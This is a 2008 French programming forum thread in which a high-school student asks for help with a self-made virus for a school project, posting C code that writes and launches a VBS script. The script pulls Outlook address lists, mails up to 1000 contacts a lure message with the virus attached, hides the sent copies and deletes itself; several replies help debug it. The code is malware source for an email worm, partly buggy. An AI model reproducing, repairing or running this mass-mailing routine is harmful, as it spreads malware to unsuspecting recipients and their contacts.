begin process at 2012 05 30 10:08:09
  Trouver un code source :

dans

Accueil > Forum > 

C

> 

Windows

> 

Autre

> 

TPE 2007-2008 aide svp

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

TPE 2007-2008 aide svp

mardi 5 février 2008 à 11:31:33 | TPE 2007-2008 aide svp

hazkaal

Bonjour,

Je suis en année de premiere scientifique (option SI) et l'heure du passage devant un jury pour le TPE approche.

J'ai choisit, comme thème les virus informatiques et j'ai dut en créer un. Malheureusement, il y a un problème dans le code. Ce virus a été programmé en C (avec Dev Cpp) et est inspiré du virus Xanax de Gygabite. En fait, ce code en C créé un fichier VBS (visual basic) pour l'infection mail et écrit dedans avec lma fonctionfprintf. La compilation du programme se passe normalement mais quand je test ce programme sur mon pc, celui ci plante : en effet, quand je met le code vbs en commentaires le pc n'en tient pas compte et le virus fonctionne normalement (sans infection mail) mais quand je met la fonctionfprintfaccessible à la compilation ça ne fonctionne pas...

Voici un extrait de mon programme avec le code VBS (avec lesfpintf) :

vfile = fopen("c:\\TPEvirus0708.vbs","wt");   if(vfile)
   {
    VirMsgBox("code en version VBS"); /* n'y passe pas ??? */
     fprintf(vfile,"On Error Resume Next\n");
     fprintf(vfile,"Dim TPEvirus0708, Mail, Counter, A, B, C, D, E, F\n");
     fprintf(vfile,"Set TPEvirus0708 = CreateObject(%coutlook.application%c)\n", 34, 34);
     fprintf(vfile,"Set Mail = TPEvirus0708.GetNameSpace(%cMAPI%c)\n", 34, 34);
     fprintf(vfile,"For A = 1 To Mail.AddressLists.Count\n");
     fprintf(vfile,"FOR B = Mail.AdressLists(A)\n");
     fprintf(vfile,"Counter = 1\n");
     fprintf(vfile,"Set C = TPEvirus0708.CreateItem(0)\n");
     fprintf(vfile,"For D = 1 To B.AdressEntries.Count\n");
     fprintf(vfile,"E = B.AdressEntries(Counter)\n");
     fprintf(vfile,"C.Recipients.Add E\n");
     fprintf(vfile,"Counter = Counter + 1\n");
     fprintf(vfile,"If Counter > 1000 Then Exit For\n");
     fprintf(vfile,"Next\n");
     fprintf(vfile,"C.Subject = %cNeed For Speed for YOUR Computer? Try This!%c\n", 34, 34);
     fprintf(vfile,"C.Body = %cTEXTE MESSAGE", 34);
     fprintf(vfile,"TEXTE MESSAGE");
     fprintf(vfile,"TEXTE MESSAGE%c", 34);
     fprintf(vfile,"C.Attachments.Add %c%s%csystem%c%s%c\n, 34, Buffer, 92 ,92, CopyName, 34");
     fprintf(vfile,"C.DeleteAfterSubmit = True\n");
     fprintf(vfile,"C.Send\n");
     fprintf(vfile,"E = %c%c\n", 34, 34);
     fprintf(vfile,"Next\n");
     fprintf(vfile,"Set F = CreateObject(%cScripting.FileSystemObject%c", 34, 34);
     fprintf(vfile,"F.DeleteFile Wscript.ScriptFullName\n");
     fclose(vfile);
    }
    VirMsgBox("005:execution du code VBS");
    ShellExecute(NULL, "open", "TPEvirus0708.vbs", NULL, NULL, SW_SHOWNORMAL);

Je met des MessageBox pour qu'à l'installation du virus, des explications s'affichent (j'ai créé une fonction VirMsgBox pour cela).

On en vient donc à la question :
 Y a t'il une fonction pour remplacer fprintfqui ne ferait pas planter le programme

Merci de votre Aide !!! 
Cordialement !
--HAZKAAL--

mardi 5 février 2008 à 12:46:14 | Re : TPE 2007-2008 aide svp

victorcoasne

Membre Club
Réponse acceptée !
Bonjour,

Personnellement j'utilise les flux C++.
Et je me suis créé une librairie de gestion des fichiers qui utilise les API (mais ça je la garde).

Regarde ma source : http://www.cppfrance.com/codes/ENVOI-RECEPTION-FICHIERS-CLIENT-SERVEUR-DEV-CPLUSPLUS_41921.aspx
Il y a le client qui lit et le serveur qui écrit un fichier en C++.

Merci et bonne prog,
@++

Le créateur du site http://victorlogiciels.com
mardi 5 février 2008 à 12:48:38 | Re : TPE 2007-2008 aide svp

victorcoasne

Membre Club
Réponse acceptée !
Bonjour,

Au fait bonne chance pour ton TPE.
Moi je suis en Terminale et je fais PPE, là c'est un truc chaud.
Commande du bras schrader à distance via un réseau informatique.
Il y a une ordinateur système relié à la carte électronique que je fais actuellement, cette carte est relié aux distributeurs. L'ordinateur système est relié à un réseau informatique.
Il y a un logiciel serveur (sur l'ordi système) et un logiciel client (pupitre virtuel).

Bon allez j'ai du boulot !

Merci et bonne prog,
@++

mardi 5 février 2008 à 13:55:11 | Re : TPE 2007-2008 aide svp

juju12

Réponse acceptée !

Où le programme plante-t-il? A l'écriture dans le fichier, ou à l'exécution?

mardi 5 février 2008 à 17:41:32 | Re : TPE 2007-2008 aide svp

hazkaal

Réponse acceptée !

Salut,

Merci pour les réponses et pour l'encouragement c'est gentil 
En fait mon programme est en C et ça m'embeterait de devoir tout refaire en C++...
mon programme marche à la compilation... C'est à l'execution qu'il plante... ...
heeeeelp please

Cordialement
Merci beacoup pour le soutient   

--HAZKAAL--

mardi 5 février 2008 à 18:17:40 | Re : TPE 2007-2008 aide svp

jfrancois

Réponse acceptée !
Bonjour,

1) Le guillemet dans une chaîne se code avec \" ! c'est plus simple que ces %c et 34
fprintf(vfile,"C.Body = %cxxx%c", 34,34);
devient
fprintf(vfile,"C.Body = \"xxx\"");

2) Open "c:\TPEvirus0708.vbs" et ShellExecute sans le "c:\" ! Trouve-t-il le fichier créé ?

Jean-François

mardi 5 février 2008 à 18:42:50 | Re : TPE 2007-2008 aide svp

victorcoasne

Membre Club
Réponse acceptée !
Bonjour,

Pour passer en C++ il n'y a rien à changer à part l'extension du fichier .cpp au lieu de .c !
C'est magique sous Dev-C++. Si tu l'as mis dans un projet tu vas dans Option du projet > Fichiers > main.cpp et tu couche "Compiler en tant que C++" > OK et c'est fait.

Sinon tu débugge avec F8 et au moment ou ton prog plante tu regarde Dev-C++ tu mets un code en bleu : c'est où ça plante.

Merci et bonne prog,
@++

mardi 5 février 2008 à 18:43:04 | Re : TPE 2007-2008 aide svp

hazkaal

Réponse acceptée !

Bonjour,

Je vais essayer en créant un fichier VBS vide... peut être qu'il le remplira si je fais ainsi...  Je ne connais pas tres bien le VBS, y a t'il besoin d'un compilateur ???
Je vais aussi essayer en enlevant les %c et les 34...
Je vous tient au courant de mon avancée

Merci beaucoup pour l'aide que vous m'apportez
Cordialement.
--HAZKAAL--

mardi 5 février 2008 à 20:09:25 | Re : TPE 2007-2008 aide svp

victorcoasne

Membre Club
Réponse acceptée !
Bonjour,

C'est avec plaisir que je réponds à tes questions. Je te souhaite bonne chance pour ton TPE (Travaux Personnels Encadrés) et pour tes PPE (Projet Pluritechnique Encadré) si tu continue la SI (Sciences de l'Ingénieur).

En tout cas si tu veux j'ai trouvé un site qui m'a l'air pas mal pour apprendre le VBS : http://www.bellamyjc.org/fr/vbscript.html

Merci et bonne prog,
@++

mercredi 6 février 2008 à 11:49:29 | Re : TPE 2007-2008 aide svp

acx01b

Réponse acceptée !
salut essaye deja
FILE *f = fopen("C:\\a.txt","w");
fprintf(f,"test\n");
fclose(f);

chez moi ça marche...

sinon ton erreur doit peut-être venir de VirMsgBox

1 2

Cette discussion est classée dans : vbs, mail, code, fprintf, vfile

Répondre à ce message

Sujets en rapport avec ce message

Help!! "MAIL FAI" [ par JCpp ] Le programme fonctionnait très bien :http://www.cppfrance.com/code.aspx?ID=10717Sauf, qu'il ne fonctionne plus, car parement le IP a changéDonc, quel Problème Envoyer Mail ! : - ( ... [ par lol55 ] Bonjour,Je cherche un code qui montre comment envoyer un mail (sans pièce jointe), j'ai regardé toutes l'après-midi tout les codes du site mais à chaq probleme : Envoyer mail via smtp [ par ptlanderson ] Bonjour Je suis un étudiant M1 ! Je suis entrain de faire un projet qui est proposé par tuteur de stage. En fait, je dois faire envoyer un mail en cl Creer deux fenetres indépendantes dans le meme code [ par andrebernard ] Bonjour à tous J'aimerais créer deux fenêtres indépendantes non MDI Je suis parti du code que m'a donné CodeBlock pour essayer de "doubler" ce derni MDI ChildFrame Caption Redraw Problème (Office 2007 Thèmes) [ par TeniX ] Bonjour, Je rencontre un problème d'affichage sur la barre de titre de mes fenêtres enfant MDI quand je suis en thème Office (Bleu,Noir,Argenté ou Cy Problème de code en C [ par Guillaume170194 ] Bonjour à tous Je ne vois pas le problème que peut avoir le code. Je choisi le niveau mais après cela ne correspond pas. Merci de votre aide Voici l Fichier impossible à lire - C++ builder 6 [ par Rionirind ] Bonjour à tous. Je me trouve à cours d'idées dans la résolution de ce problème... J'ai un bouton qui me permets d'afficher le contenu d'un fichier I Compiler VLC sous windows [ par nostalgieing ] Bonjour, Je veux compiler le code source de VLc sous windows et j'utilise MinGW/MSys pour le compiler mais la commande $make ne fonctionne pas, il m Creer une fonction Logistique [ par landroux ] Bonjour, je suis débutant en programmation et je souhaiterais écrire une fonction logistique mais mon code à un problème, si quelqu'un peu m'aider...[ Protocole ICMP (ping) [ par bouzakaria ] bonjour j'utilise actuellement le programme pingueur.c pour simuler la commande dos ping (protocole ICMP), lorsque l'adresse IP est correcte le prog

Nos sponsors

Sondage...

CalendriCode

Mai 2012
LMMJVSD
 123456
78910111213
14151617181920
21222324252627
28293031   

Consulter la suite du CalendriCode

Photothèque

A découvrir

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 0,889 sec (4)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales